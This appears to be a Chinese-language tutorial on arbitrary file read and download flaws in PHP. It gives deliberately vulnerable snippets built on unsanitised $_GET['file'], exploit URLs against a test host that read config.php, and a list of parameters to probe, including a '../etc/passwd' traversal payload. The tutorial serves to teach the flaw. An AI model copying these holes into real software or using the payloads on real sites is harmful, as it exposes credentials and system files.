0x01 危害说明

下载服务器任意文件,例如脚本代码、系统配置文件、数据库配置文件下载或读取后续
、接口密匙信息文件下载或读取后续等等可用的代码进行代码审计或是获取系统ssh进行登录、获取数据库账号密码进行连接等等

0x02 任意文件读取-利用与代码

0x02.1 例子一

0x02.1.1 代码

  1. <?php
  2. $filename = $_GET['file'];
  3. readfile($filename);
  4. ?>
  1. <?php
  2. $filename = $_GET['file'];
  3. $fp = fopen($filename,"r") or die("Unable to open file!");
  4. $data = fread($fp,filesize($filename));
  5. fclose($fp);
  6. echo $data;
  7. ?>
  1. <?php
  2. $filename = $_GET['file'];
  3. echo file_get_contents($filename);
  4. ?>

0x02.1.1 利用

  1. 打开: http://atest.test/download.php?file=./config.php

0x02.2 例子二

0x02.2.1 代码

  1. <?php
  2. $filename = $_GET['file'];
  3. copy($filename, 'xxx.txt');
  4. ?>

0x02.2.1 利用

  1. 打开: http://atest.test/test.php?file=./config.php

打开完毕以后, copy() 函数会把数据复制到 xxx.txt 里面

  1. 打开: http://atest.test/xxx.txt

0x03 任意文件下载-利用与代码

0x03.1 利用代码

  1. <?php
  2. $filename = $_GET['file'];
  3. header("Content-type:application/octet-stream");
  4. header("Content-Disposition:attachment;filename=" . $filename);
  5. header("Accept-ranges:bytes");
  6. header("Accept-length:".filesize($filename));
  7. readfile($filename);
  8. ?>

0x03.2 利用

  1. 打开: http://atest.test/download.php?file=./任意文件下载测试.txt

image.png

image.png

image.png

0x04 漏洞挖掘的方法

  1. 多多关注一些参数如下:
  2. download.php?path=./../etc/passwd
  3. down.xxx?filename=
  4. download.php?Path=
  5. download.php?path=
  6. download.php?RealPath=
  7. download.php?FilePath=
  8. download.php?filepath=
  9. download.php?inputFile=
  10. download.php?url=
  11. download.php?urls=
  12. download.php?dir=
  13. download.php?data=
  14. download.php?readle=
  15. download.php?src=
  16. download.php?inputfile=
  17. download.php?META-INF=
  18. download.php?WEB-INF
  19. download.php?menu=
  20. 等....